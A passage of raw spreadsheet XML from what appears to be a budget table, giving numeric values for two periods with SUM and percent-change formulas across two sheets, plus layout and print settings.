      <c r="WVK23" s="1016"/>
      <c r="WVL23" s="1016"/>
      <c r="WVM23" s="1016"/>
      <c r="WVN23" s="1016"/>
      <c r="WVO23" s="1016"/>
      <c r="WVP23" s="1016"/>
      <c r="WVQ23" s="1016"/>
      <c r="WVR23" s="1016"/>
      <c r="WVS23" s="1016"/>
      <c r="WVT23" s="1016"/>
      <c r="WVU23" s="1016"/>
      <c r="WVV23" s="1016"/>
      <c r="WVW23" s="1016"/>
      <c r="WVX23" s="1016"/>
      <c r="WVY23" s="1016"/>
      <c r="WVZ23" s="1016"/>
      <c r="WWA23" s="1016"/>
      <c r="WWB23" s="1016"/>
      <c r="WWC23" s="1016"/>
      <c r="WWD23" s="1016"/>
      <c r="WWE23" s="1016"/>
      <c r="WWF23" s="1016"/>
      <c r="WWG23" s="1016"/>
      <c r="WWH23" s="1016"/>
      <c r="WWI23" s="1016"/>
      <c r="WWJ23" s="1016"/>
      <c r="WWK23" s="1016"/>
      <c r="WWL23" s="1016"/>
      <c r="WWM23" s="1016"/>
      <c r="WWN23" s="1016"/>
      <c r="WWO23" s="1016"/>
      <c r="WWP23" s="1016"/>
      <c r="WWQ23" s="1016"/>
      <c r="WWR23" s="1016"/>
      <c r="WWS23" s="1016"/>
      <c r="WWT23" s="1016"/>
      <c r="WWU23" s="1016"/>
      <c r="WWV23" s="1016"/>
      <c r="WWW23" s="1016"/>
      <c r="WWX23" s="1016"/>
      <c r="WWY23" s="1016"/>
      <c r="WWZ23" s="1016"/>
      <c r="WXA23" s="1016"/>
      <c r="WXB23" s="1016"/>
      <c r="WXC23" s="1016"/>
      <c r="WXD23" s="1016"/>
      <c r="WXE23" s="1016"/>
      <c r="WXF23" s="1016"/>
      <c r="WXG23" s="1016"/>
      <c r="WXH23" s="1016"/>
      <c r="WXI23" s="1016"/>
      <c r="WXJ23" s="1016"/>
      <c r="WXK23" s="1016"/>
      <c r="WXL23" s="1016"/>
      <c r="WXM23" s="1016"/>
      <c r="WXN23" s="1016"/>
      <c r="WXO23" s="1016"/>
      <c r="WXP23" s="1016"/>
      <c r="WXQ23" s="1016"/>
      <c r="WXR23" s="1016"/>
      <c r="WXS23" s="1016"/>
      <c r="WXT23" s="1016"/>
      <c r="WXU23" s="1016"/>
      <c r="WXV23" s="1016"/>
      <c r="WXW23" s="1016"/>
      <c r="WXX23" s="1016"/>
      <c r="WXY23" s="1016"/>
      <c r="WXZ23" s="1016"/>
      <c r="WYA23" s="1016"/>
      <c r="WYB23" s="1016"/>
      <c r="WYC23" s="1016"/>
      <c r="WYD23" s="1016"/>
      <c r="WYE23" s="1016"/>
      <c r="WYF23" s="1016"/>
      <c r="WYG23" s="1016"/>
      <c r="WYH23" s="1016"/>
      <c r="WYI23" s="1016"/>
      <c r="WYJ23" s="1016"/>
      <c r="WYK23" s="1016"/>
      <c r="WYL23" s="1016"/>
      <c r="WYM23" s="1016"/>
      <c r="WYN23" s="1016"/>
      <c r="WYO23" s="1016"/>
      <c r="WYP23" s="1016"/>
      <c r="WYQ23" s="1016"/>
      <c r="WYR23" s="1016"/>
      <c r="WYS23" s="1016"/>
      <c r="WYT23" s="1016"/>
      <c r="WYU23" s="1016"/>
      <c r="WYV23" s="1016"/>
      <c r="WYW23" s="1016"/>
      <c r="WYX23" s="1016"/>
      <c r="WYY23" s="1016"/>
      <c r="WYZ23" s="1016"/>
      <c r="WZA23" s="1016"/>
      <c r="WZB23" s="1016"/>
      <c r="WZC23" s="1016"/>
      <c r="WZD23" s="1016"/>
      <c r="WZE23" s="1016"/>
      <c r="WZF23" s="1016"/>
      <c r="WZG23" s="1016"/>
      <c r="WZH23" s="1016"/>
      <c r="WZI23" s="1016"/>
      <c r="WZJ23" s="1016"/>
      <c r="WZK23" s="1016"/>
      <c r="WZL23" s="1016"/>
      <c r="WZM23" s="1016"/>
      <c r="WZN23" s="1016"/>
      <c r="WZO23" s="1016"/>
      <c r="WZP23" s="1016"/>
      <c r="WZQ23" s="1016"/>
      <c r="WZR23" s="1016"/>
      <c r="WZS23" s="1016"/>
      <c r="WZT23" s="1016"/>
      <c r="WZU23" s="1016"/>
      <c r="WZV23" s="1016"/>
      <c r="WZW23" s="1016"/>
      <c r="WZX23" s="1016"/>
      <c r="WZY23" s="1016"/>
      <c r="WZZ23" s="1016"/>
      <c r="XAA23" s="1016"/>
      <c r="XAB23" s="1016"/>
      <c r="XAC23" s="1016"/>
      <c r="XAD23" s="1016"/>
      <c r="XAE23" s="1016"/>
      <c r="XAF23" s="1016"/>
      <c r="XAG23" s="1016"/>
      <c r="XAH23" s="1016"/>
      <c r="XAI23" s="1016"/>
      <c r="XAJ23" s="1016"/>
      <c r="XAK23" s="1016"/>
      <c r="XAL23" s="1016"/>
      <c r="XAM23" s="1016"/>
      <c r="XAN23" s="1016"/>
      <c r="XAO23" s="1016"/>
      <c r="XAP23" s="1016"/>
      <c r="XAQ23" s="1016"/>
      <c r="XAR23" s="1016"/>
      <c r="XAS23" s="1016"/>
      <c r="XAT23" s="1016"/>
      <c r="XAU23" s="1016"/>
      <c r="XAV23" s="1016"/>
      <c r="XAW23" s="1016"/>
      <c r="XAX23" s="1016"/>
      <c r="XAY23" s="1016"/>
      <c r="XAZ23" s="1016"/>
      <c r="XBA23" s="1016"/>
      <c r="XBB23" s="1016"/>
      <c r="XBC23" s="1016"/>
      <c r="XBD23" s="1016"/>
      <c r="XBE23" s="1016"/>
      <c r="XBF23" s="1016"/>
      <c r="XBG23" s="1016"/>
      <c r="XBH23" s="1016"/>
      <c r="XBI23" s="1016"/>
      <c r="XBJ23" s="1016"/>
      <c r="XBK23" s="1016"/>
      <c r="XBL23" s="1016"/>
      <c r="XBM23" s="1016"/>
      <c r="XBN23" s="1016"/>
      <c r="XBO23" s="1016"/>
      <c r="XBP23" s="1016"/>
      <c r="XBQ23" s="1016"/>
      <c r="XBR23" s="1016"/>
      <c r="XBS23" s="1016"/>
      <c r="XBT23" s="1016"/>
      <c r="XBU23" s="1016"/>
      <c r="XBV23" s="1016"/>
      <c r="XBW23" s="1016"/>
      <c r="XBX23" s="1016"/>
      <c r="XBY23" s="1016"/>
      <c r="XBZ23" s="1016"/>
      <c r="XCA23" s="1016"/>
      <c r="XCB23" s="1016"/>
      <c r="XCC23" s="1016"/>
      <c r="XCD23" s="1016"/>
      <c r="XCE23" s="1016"/>
      <c r="XCF23" s="1016"/>
      <c r="XCG23" s="1016"/>
      <c r="XCH23" s="1016"/>
      <c r="XCI23" s="1016"/>
      <c r="XCJ23" s="1016"/>
      <c r="XCK23" s="1016"/>
      <c r="XCL23" s="1016"/>
      <c r="XCM23" s="1016"/>
      <c r="XCN23" s="1016"/>
      <c r="XCO23" s="1016"/>
      <c r="XCP23" s="1016"/>
      <c r="XCQ23" s="1016"/>
      <c r="XCR23" s="1016"/>
      <c r="XCS23" s="1016"/>
      <c r="XCT23" s="1016"/>
      <c r="XCU23" s="1016"/>
      <c r="XCV23" s="1016"/>
      <c r="XCW23" s="1016"/>
      <c r="XCX23" s="1016"/>
      <c r="XCY23" s="1016"/>
      <c r="XCZ23" s="1016"/>
      <c r="XDA23" s="1016"/>
      <c r="XDB23" s="1016"/>
      <c r="XDC23" s="1016"/>
      <c r="XDD23" s="1016"/>
      <c r="XDE23" s="1016"/>
      <c r="XDF23" s="1016"/>
      <c r="XDG23" s="1016"/>
      <c r="XDH23" s="1016"/>
      <c r="XDI23" s="1016"/>
      <c r="XDJ23" s="1016"/>
      <c r="XDK23" s="1016"/>
      <c r="XDL23" s="1016"/>
      <c r="XDM23" s="1016"/>
      <c r="XDN23" s="1016"/>
      <c r="XDO23" s="1016"/>
      <c r="XDP23" s="1016"/>
      <c r="XDQ23" s="1016"/>
      <c r="XDR23" s="1016"/>
      <c r="XDS23" s="1016"/>
      <c r="XDT23" s="1016"/>
      <c r="XDU23" s="1016"/>
      <c r="XDV23" s="1016"/>
      <c r="XDW23" s="1016"/>
    </row>
    <row r="24" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A24" s="778" t="s">
        <v>743</v>
      </c>
      <c r="B24" s="567">
        <f>B25+B26</f>
        <v>243470</v>
      </c>
      <c r="C24" s="979">
        <f>SUM(C25:C26)</f>
        <v>199500</v>
      </c>
      <c r="D24" s="978">
        <f t="shared" si="0"/>
        <v>-18.0597198833532</v>
      </c>
      <c r="XDX24"/>
      <c r="XDY24"/>
      <c r="XDZ24"/>
      <c r="XEA24"/>
      <c r="XEB24"/>
      <c r="XEC24"/>
      <c r="XED24"/>
      <c r="XEE24"/>
      <c r="XEF24"/>
      <c r="XEG24"/>
      <c r="XEH24"/>
      <c r="XEI24"/>
      <c r="XEJ24"/>
      <c r="XEK24"/>
      <c r="XEL24"/>
      <c r="XEM24"/>
      <c r="XEN24"/>
      <c r="XEO24"/>
      <c r="XEP24"/>
      <c r="XEQ24"/>
      <c r="XER24"/>
      <c r="XES24"/>
      <c r="XET24"/>
      <c r="XEU24"/>
      <c r="XEV24"/>
      <c r="XEW24"/>
      <c r="XEX24"/>
      <c r="XEY24"/>
      <c r="XEZ24"/>
      <c r="XFA24"/>
      <c r="XFB24"/>
      <c r="XFC24"/>
      <c r="XFD24"/>
    </row>
    <row r="25" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A25" s="778" t="s">
        <v>744</v>
      </c>
      <c r="B25" s="979">
        <v>153300</v>
      </c>
      <c r="C25" s="979">
        <v>140500</v>
      </c>
      <c r="D25" s="978">
        <f t="shared" si="0"/>
        <v>-8.34964122635355</v>
      </c>
      <c r="XDX25"/>
      <c r="XDY25"/>
      <c r="XDZ25"/>
      <c r="XEA25"/>
      <c r="XEB25"/>
      <c r="XEC25"/>
      <c r="XED25"/>
      <c r="XEE25"/>
      <c r="XEF25"/>
      <c r="XEG25"/>
      <c r="XEH25"/>
      <c r="XEI25"/>
      <c r="XEJ25"/>
      <c r="XEK25"/>
      <c r="XEL25"/>
      <c r="XEM25"/>
      <c r="XEN25"/>
      <c r="XEO25"/>
      <c r="XEP25"/>
      <c r="XEQ25"/>
      <c r="XER25"/>
      <c r="XES25"/>
      <c r="XET25"/>
      <c r="XEU25"/>
      <c r="XEV25"/>
      <c r="XEW25"/>
      <c r="XEX25"/>
      <c r="XEY25"/>
      <c r="XEZ25"/>
      <c r="XFA25"/>
      <c r="XFB25"/>
      <c r="XFC25"/>
      <c r="XFD25"/>
    </row>
    <row r="26" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A26" s="778" t="s">
        <v>745</v>
      </c>
      <c r="B26" s="979">
        <v>90170</v>
      </c>
      <c r="C26" s="979">
        <v>59000</v>
      </c>
      <c r="D26" s="978">
        <f t="shared" si="0"/>
        <v>-34.5680381501608</v>
      </c>
      <c r="XDX26"/>
      <c r="XDY26"/>
      <c r="XDZ26"/>
      <c r="XEA26"/>
      <c r="XEB26"/>
      <c r="XEC26"/>
      <c r="XED26"/>
      <c r="XEE26"/>
      <c r="XEF26"/>
      <c r="XEG26"/>
      <c r="XEH26"/>
      <c r="XEI26"/>
      <c r="XEJ26"/>
      <c r="XEK26"/>
      <c r="XEL26"/>
      <c r="XEM26"/>
      <c r="XEN26"/>
      <c r="XEO26"/>
      <c r="XEP26"/>
      <c r="XEQ26"/>
      <c r="XER26"/>
      <c r="XES26"/>
      <c r="XET26"/>
      <c r="XEU26"/>
      <c r="XEV26"/>
      <c r="XEW26"/>
      <c r="XEX26"/>
      <c r="XEY26"/>
      <c r="XEZ26"/>
      <c r="XFA26"/>
      <c r="XFB26"/>
      <c r="XFC26"/>
      <c r="XFD26"/>
    </row>
    <row r="27" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A27" s="778" t="s">
        <v>746</v>
      </c>
      <c r="B27" s="567">
        <f>B28+B29+B30+B31</f>
        <v>36870</v>
      </c>
      <c r="C27" s="979">
        <f>SUM(C28:C31)</f>
        <v>76966</v>
      </c>
      <c r="D27" s="978">
        <f t="shared" si="0"/>
        <v>108.749660970979</v>
      </c>
      <c r="XDX27"/>
      <c r="XDY27"/>
      <c r="XDZ27"/>
      <c r="XEA27"/>
      <c r="XEB27"/>
      <c r="XEC27"/>
      <c r="XED27"/>
      <c r="XEE27"/>
      <c r="XEF27"/>
      <c r="XEG27"/>
      <c r="XEH27"/>
      <c r="XEI27"/>
      <c r="XEJ27"/>
      <c r="XEK27"/>
      <c r="XEL27"/>
      <c r="XEM27"/>
      <c r="XEN27"/>
      <c r="XEO27"/>
      <c r="XEP27"/>
      <c r="XEQ27"/>
      <c r="XER27"/>
      <c r="XES27"/>
      <c r="XET27"/>
      <c r="XEU27"/>
      <c r="XEV27"/>
      <c r="XEW27"/>
      <c r="XEX27"/>
      <c r="XEY27"/>
      <c r="XEZ27"/>
      <c r="XFA27"/>
      <c r="XFB27"/>
      <c r="XFC27"/>
      <c r="XFD27"/>
    </row>
    <row r="28" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A28" s="778" t="s">
        <v>747</v>
      </c>
      <c r="B28" s="567">
        <v>5969</v>
      </c>
      <c r="C28" s="979">
        <v>8549</v>
      </c>
      <c r="D28" s="978">
        <f t="shared" si="0"/>
        <v>43.2233204891942</v>
      </c>
      <c r="XDX28"/>
      <c r="XDY28"/>
      <c r="XDZ28"/>
      <c r="XEA28"/>
      <c r="XEB28"/>
      <c r="XEC28"/>
      <c r="XED28"/>
      <c r="XEE28"/>
      <c r="XEF28"/>
      <c r="XEG28"/>
      <c r="XEH28"/>
      <c r="XEI28"/>
      <c r="XEJ28"/>
      <c r="XEK28"/>
      <c r="XEL28"/>
      <c r="XEM28"/>
      <c r="XEN28"/>
      <c r="XEO28"/>
      <c r="XEP28"/>
      <c r="XEQ28"/>
      <c r="XER28"/>
      <c r="XES28"/>
      <c r="XET28"/>
      <c r="XEU28"/>
      <c r="XEV28"/>
      <c r="XEW28"/>
      <c r="XEX28"/>
      <c r="XEY28"/>
      <c r="XEZ28"/>
      <c r="XFA28"/>
      <c r="XFB28"/>
      <c r="XFC28"/>
      <c r="XFD28"/>
    </row>
    <row r="29" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A29" s="778" t="s">
        <v>669</v>
      </c>
      <c r="B29" s="567"/>
      <c r="C29" s="979"/>
      <c r="D29" s="978"/>
      <c r="XDX29"/>
      <c r="XDY29"/>
      <c r="XDZ29"/>
      <c r="XEA29"/>
      <c r="XEB29"/>
      <c r="XEC29"/>
      <c r="XED29"/>
      <c r="XEE29"/>
      <c r="XEF29"/>
      <c r="XEG29"/>
      <c r="XEH29"/>
      <c r="XEI29"/>
      <c r="XEJ29"/>
      <c r="XEK29"/>
      <c r="XEL29"/>
      <c r="XEM29"/>
      <c r="XEN29"/>
      <c r="XEO29"/>
      <c r="XEP29"/>
      <c r="XEQ29"/>
      <c r="XER29"/>
      <c r="XES29"/>
      <c r="XET29"/>
      <c r="XEU29"/>
      <c r="XEV29"/>
      <c r="XEW29"/>
      <c r="XEX29"/>
      <c r="XEY29"/>
      <c r="XEZ29"/>
      <c r="XFA29"/>
      <c r="XFB29"/>
      <c r="XFC29"/>
      <c r="XFD29"/>
    </row>
    <row r="30" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A30" s="778" t="s">
        <v>748</v>
      </c>
      <c r="B30" s="567"/>
      <c r="C30" s="979"/>
      <c r="D30" s="978"/>
      <c r="XDX30"/>
      <c r="XDY30"/>
      <c r="XDZ30"/>
      <c r="XEA30"/>
      <c r="XEB30"/>
      <c r="XEC30"/>
      <c r="XED30"/>
      <c r="XEE30"/>
      <c r="XEF30"/>
      <c r="XEG30"/>
      <c r="XEH30"/>
      <c r="XEI30"/>
      <c r="XEJ30"/>
      <c r="XEK30"/>
      <c r="XEL30"/>
      <c r="XEM30"/>
      <c r="XEN30"/>
      <c r="XEO30"/>
      <c r="XEP30"/>
      <c r="XEQ30"/>
      <c r="XER30"/>
      <c r="XES30"/>
      <c r="XET30"/>
      <c r="XEU30"/>
      <c r="XEV30"/>
      <c r="XEW30"/>
      <c r="XEX30"/>
      <c r="XEY30"/>
      <c r="XEZ30"/>
      <c r="XFA30"/>
      <c r="XFB30"/>
      <c r="XFC30"/>
      <c r="XFD30"/>
    </row>
    <row r="31" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A31" s="778" t="s">
        <v>749</v>
      </c>
      <c r="B31" s="567">
        <v>30901</v>
      </c>
      <c r="C31" s="979">
        <v>68417</v>
      </c>
      <c r="D31" s="978">
        <f t="shared" si="0"/>
        <v>121.407074204718</v>
      </c>
      <c r="XDX31"/>
      <c r="XDY31"/>
      <c r="XDZ31"/>
      <c r="XEA31"/>
      <c r="XEB31"/>
      <c r="XEC31"/>
      <c r="XED31"/>
      <c r="XEE31"/>
      <c r="XEF31"/>
      <c r="XEG31"/>
      <c r="XEH31"/>
      <c r="XEI31"/>
      <c r="XEJ31"/>
      <c r="XEK31"/>
      <c r="XEL31"/>
      <c r="XEM31"/>
      <c r="XEN31"/>
      <c r="XEO31"/>
      <c r="XEP31"/>
      <c r="XEQ31"/>
      <c r="XER31"/>
      <c r="XES31"/>
      <c r="XET31"/>
      <c r="XEU31"/>
      <c r="XEV31"/>
      <c r="XEW31"/>
      <c r="XEX31"/>
      <c r="XEY31"/>
      <c r="XEZ31"/>
      <c r="XFA31"/>
      <c r="XFB31"/>
      <c r="XFC31"/>
      <c r="XFD31"/>
    </row>
    <row r="32" s="968" customFormat="1" ht="20" customHeight="1" spans="1:16384">
      <c r="A32" s="1032" t="s">
        <v>750</v>
      </c>
      <c r="B32" s="1033">
        <f>B23+B24+B27</f>
        <v>465580</v>
      </c>
      <c r="C32" s="1034">
        <f>C23+C24+C27</f>
        <v>417287</v>
      </c>
      <c r="D32" s="985">
        <f t="shared" si="0"/>
        <v>-10.3726534644959</v>
      </c>
      <c r="XDX32"/>
      <c r="XDY32"/>
      <c r="XDZ32"/>
      <c r="XEA32"/>
      <c r="XEB32"/>
      <c r="XEC32"/>
      <c r="XED32"/>
      <c r="XEE32"/>
      <c r="XEF32"/>
      <c r="XEG32"/>
      <c r="XEH32"/>
      <c r="XEI32"/>
      <c r="XEJ32"/>
      <c r="XEK32"/>
      <c r="XEL32"/>
      <c r="XEM32"/>
      <c r="XEN32"/>
      <c r="XEO32"/>
      <c r="XEP32"/>
      <c r="XEQ32"/>
      <c r="XER32"/>
      <c r="XES32"/>
      <c r="XET32"/>
      <c r="XEU32"/>
      <c r="XEV32"/>
      <c r="XEW32"/>
      <c r="XEX32"/>
      <c r="XEY32"/>
      <c r="XEZ32"/>
      <c r="XFA32"/>
      <c r="XFB32"/>
      <c r="XFC32"/>
      <c r="XFD32"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.511805555555556" right="0.432638888888889" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:XEZ54"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B33" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B6" sqref="B6:B54"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="59.1851851851852" style="968" customWidth="1"/>
    <col min="2" max="4" width="14.4259259259259" style="968" customWidth="1"/>
    <col min="5" max="16366" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:4">
      <c r="A1" s="858" t="s">
        <v>751</v>
      </c>
      <c r="D1" s="986"/>
    </row>
    <row r="2" ht="26.4" spans="1:4">
      <c r="A2" s="998" t="s">
        <v>752</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
    </row>
    <row r="3" spans="4:4">
      <c r="D3" s="1017" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="4" ht="24.95" customHeight="1" spans="1:4">
      <c r="A4" s="919" t="s">
        <v>753</v>
      </c>
      <c r="B4" s="1018" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="919" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="1019"/>
    </row>
    <row r="5" ht="28.8" spans="1:4">
      <c r="A5" s="922"/>
      <c r="B5" s="1018"/>
      <c r="C5" s="919" t="s">
        <v>378</v>
      </c>
      <c r="D5" s="1018" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="17.1" customHeight="1" spans="1:4">
      <c r="A6" s="974" t="s">
        <v>548</v>
      </c>
      <c r="B6" s="1020"/>
      <c r="C6" s="1021"/>
      <c r="D6" s="989"/>
    </row>
    <row r="7" ht="17.1" customHeight="1" spans="1:4">
      <c r="A7" s="974" t="s">
        <v>549</v>
      </c>
      <c r="B7" s="839"/>
      <c r="C7" s="1021">
        <v>8</v>
      </c>
      <c r="D7" s="989"/>
    </row>
    <row r="8" ht="17.1" customHeight="1" spans="1:4">
      <c r="A8" s="974" t="s">
        <v>754</v>
      </c>
      <c r="B8" s="839"/>
      <c r="C8" s="1021">
        <v>8</v>
      </c>
      <c r="D8" s="989"/>
    </row>
    <row r="9" ht="17.1" customHeight="1" spans="1:4">
      <c r="A9" s="974" t="s">
        <v>755</v>
      </c>
      <c r="B9" s="1022"/>
      <c r="C9" s="1021"/>
      <c r="D9" s="989"/>
    </row>
    <row r="10" ht="17.1" customHeight="1" spans="1:4">
      <c r="A10" s="974" t="s">
        <v>756</v>
      </c>
      <c r="B10" s="839"/>
      <c r="C10" s="1021"/>
      <c r="D10" s="989"/>
    </row>
    <row r="11" ht="17.1" customHeight="1" spans="1:4">
      <c r="A11" s="974" t="s">
        <v>757</v>
      </c>
      <c r="B11" s="839"/>
      <c r="C11" s="1021"/>
      <c r="D11" s="989"/>
    </row>
    <row r="12" ht="17.1" customHeight="1" spans="1:4">
      <c r="A12" s="974" t="s">
        <v>758</v>
      </c>
      <c r="B12" s="1022"/>
      <c r="C12" s="1021"/>
      <c r="D12" s="989"/>
    </row>
    <row r="13" ht="17.1" customHeight="1" spans="1:4">
      <c r="A13" s="974" t="s">
        <v>759</v>
      </c>
      <c r="B13" s="1022"/>
      <c r="C13" s="1021"/>
      <c r="D13" s="989"/>
    </row>
    <row r="14" ht="17.1" customHeight="1" spans="1:4">
      <c r="A14" s="974" t="s">
        <v>760</v>
      </c>
      <c r="B14" s="839">
        <f>SUM(B15:B25)</f>
        <v>231132</v>
      </c>
      <c r="C14" s="839">
        <f>SUM(C15:C25)</f>
        <v>105032</v>
      </c>
      <c r="D14" s="989">
        <f>IFERROR((C14-B14)/B14*100,"-")</f>
        <v>-54.5575688351245</v>
      </c>
    </row>
    <row r="15" ht="17.1" customHeight="1" spans="1:4">
      <c r="A15" s="974" t="s">
        <v>761</v>
      </c>
      <c r="B15" s="977">
        <v>137421</v>
      </c>
      <c r="C15" s="1021">
        <v>83050</v>
      </c>
      <c r="D15" s="989">
        <f>IFERROR((C15-B15)/B15*100,"-")</f>
        <v>-39.5652775048937</v>
      </c>
    </row>
    <row r="16" ht="17.1" customHeight="1" spans="1:4">
      <c r="A16" s="974" t="s">
        <v>762</v>
      </c>
      <c r="B16" s="977"/>
      <c r="C16" s="1021"/>
      <c r="D16" s="989"/>
    </row>
    <row r="17" ht="17.1" customHeight="1" spans="1:4">
      <c r="A17" s="974" t="s">
        <v>763</v>
      </c>
      <c r="B17" s="1022"/>
      <c r="C17" s="1022"/>
      <c r="D17" s="989"/>
    </row>
    <row r="18" ht="17.1" customHeight="1" spans="1:4">
      <c r="A18" s="974" t="s">
        <v>764</v>
      </c>
      <c r="B18" s="977">
        <v>8830</v>
      </c>
      <c r="C18" s="1021">
        <v>6306</v>
      </c>
      <c r="D18" s="989">
        <f>IFERROR((C18-B18)/B18*100,"-")</f>
        <v>-28.5843714609287</v>
      </c>
    </row>
    <row r="19" ht="17.1" customHeight="1" spans="1:4">
      <c r="A19" s="974" t="s">
        <v>765</v>
      </c>
      <c r="B19" s="977">
        <v>1981</v>
      </c>
      <c r="C19" s="1021">
        <v>2036</v>
      </c>
      <c r="D19" s="989">
        <f>IFERROR((C19-B19)/B19*100,"-")</f>
        <v>2.776375567895</v>
      </c>
    </row>
    <row r="20" ht="17.1" customHeight="1" spans="1:4">
      <c r="A20" s="974" t="s">
        <v>766</v>
      </c>
      <c r="B20" s="977"/>
      <c r="C20" s="1021"/>
      <c r="D20" s="989"/>
    </row>
    <row r="21" ht="17.1" customHeight="1" spans="1:4">
      <c r="A21" s="974" t="s">
        <v>767</v>
      </c>
      <c r="B21" s="977">
        <v>33000</v>
      </c>
      <c r="C21" s="1021">
        <v>1600</v>
      </c>
      <c r="D21" s="989">
        <f>IFERROR((C21-B21)/B21*100,"-")</f>
        <v>-95.1515151515152</v>
      </c>
    </row>
    <row r="22" ht="17.1" customHeight="1" spans="1:4">
      <c r="A22" s="974" t="s">
        <v>768</v>
      </c>
      <c r="B22" s="977"/>
      <c r="C22" s="1021"/>
      <c r="D22" s="989"/>
    </row>
    <row r="23" ht="17.1" customHeight="1" spans="1:4">
      <c r="A23" s="974" t="s">
        <v>769</v>
      </c>
      <c r="B23" s="977"/>
      <c r="C23" s="1021"/>
      <c r="D23" s="989"/>
    </row>
    <row r="24" ht="17.1" customHeight="1" spans="1:4">
      <c r="A24" s="974" t="s">
        <v>770</v>
      </c>
      <c r="B24" s="977">
        <v>49900</v>
      </c>
      <c r="C24" s="1021">
        <v>11890</v>
      </c>
      <c r="D24" s="989">
        <f>IFERROR((C24-B24)/B24*100,"-")</f>
        <v>-76.1723446893788</v>
      </c>
    </row>
    <row r="25" ht="17.1" customHeight="1" spans="1:4">
      <c r="A25" s="983" t="s">
        <v>567</v>
      </c>
      <c r="B25" s="977"/>
      <c r="C25" s="1021">
        <v>150</v>
      </c>
      <c r="D25" s="989"/>
    </row>
    <row r="26" ht="17.1" customHeight="1" spans="1:4">
      <c r="A26" s="974" t="s">
        <v>568</v>
      </c>
      <c r="B26" s="1022">
        <v>1147</v>
      </c>
      <c r="C26" s="1021">
        <v>1089</v>
      </c>
      <c r="D26" s="989">
        <f>IFERROR((C26-B26)/B26*100,"-")</f>
        <v>-5.0566695727986</v>
      </c>
    </row>
    <row r="27" ht="17.1" customHeight="1" spans="1:4">
      <c r="A27" s="974" t="s">
        <v>569</v>
      </c>
      <c r="B27" s="977">
        <v>1147</v>
      </c>
      <c r="C27" s="1021">
        <v>1089</v>
      </c>
      <c r="D27" s="989">
        <f>IFERROR((C27-B27)/B27*100,"-")</f>
        <v>-5.0566695727986</v>
      </c>
    </row>
    <row r="28" ht="17.1" customHeight="1" spans="1:4">
      <c r="A28" s="974" t="s">
        <v>570</v>
      </c>
      <c r="B28" s="839">
        <v>12</v>
      </c>
      <c r="C28" s="1021"/>
      <c r="D28" s="989">
        <f>IFERROR((C28-B28)/B28*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="29" ht="17.1" customHeight="1" spans="1:4">
      <c r="A29" s="974" t="s">
        <v>571</v>
      </c>
      <c r="B29" s="1022"/>
      <c r="C29" s="1021"/>
      <c r="D29" s="989"/>
    </row>
    <row r="30" ht="17.1" customHeight="1" spans="1:4">
      <c r="A30" s="974" t="s">
        <v>572</v>
      </c>
      <c r="B30" s="1022"/>
      <c r="C30" s="1021"/>
      <c r="D30" s="989"/>
    </row>
    <row r="31" ht="17.1" customHeight="1" spans="1:4">
      <c r="A31" s="974" t="s">
        <v>573</v>
      </c>
      <c r="B31" s="1022"/>
      <c r="C31" s="1021"/>
      <c r="D31" s="989"/>
    </row>
    <row r="32" ht="17.1" customHeight="1" spans="1:4">
      <c r="A32" s="974" t="s">
        <v>574</v>
      </c>
      <c r="B32" s="1022"/>
      <c r="C32" s="1021"/>
      <c r="D32" s="989"/>
    </row>
    <row r="33" ht="17.1" customHeight="1" spans="1:4">
      <c r="A33" s="974" t="s">
        <v>575</v>
      </c>
      <c r="B33" s="1022"/>
      <c r="C33" s="1021"/>
      <c r="D33" s="989"/>
    </row>
    <row r="34" ht="17.1" customHeight="1" spans="1:4">
      <c r="A34" s="974" t="s">
        <v>576</v>
      </c>
      <c r="B34" s="1022">
        <v>12</v>
      </c>
      <c r="C34" s="1021"/>
      <c r="D34" s="989">
        <f>IFERROR((C34-B34)/B34*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="35" ht="17.1" customHeight="1" spans="1:4">
      <c r="A35" s="974" t="s">
        <v>771</v>
      </c>
      <c r="B35" s="1022"/>
      <c r="C35" s="1021"/>
      <c r="D35" s="989"/>
    </row>
    <row r="36" ht="17.1" customHeight="1" spans="1:4">
      <c r="A36" s="974" t="s">
        <v>578</v>
      </c>
      <c r="B36" s="1022">
        <v>500</v>
      </c>
      <c r="C36" s="1021">
        <v>2913</v>
      </c>
      <c r="D36" s="989">
        <f>IFERROR((C36-B36)/B36*100,"-")</f>
        <v>482.6</v>
      </c>
    </row>
    <row r="37" ht="17.1" customHeight="1" spans="1:4">
      <c r="A37" s="974" t="s">
        <v>772</v>
      </c>
      <c r="B37" s="1022">
        <v>500</v>
      </c>
      <c r="C37" s="1021">
        <v>2913</v>
      </c>
      <c r="D37" s="989">
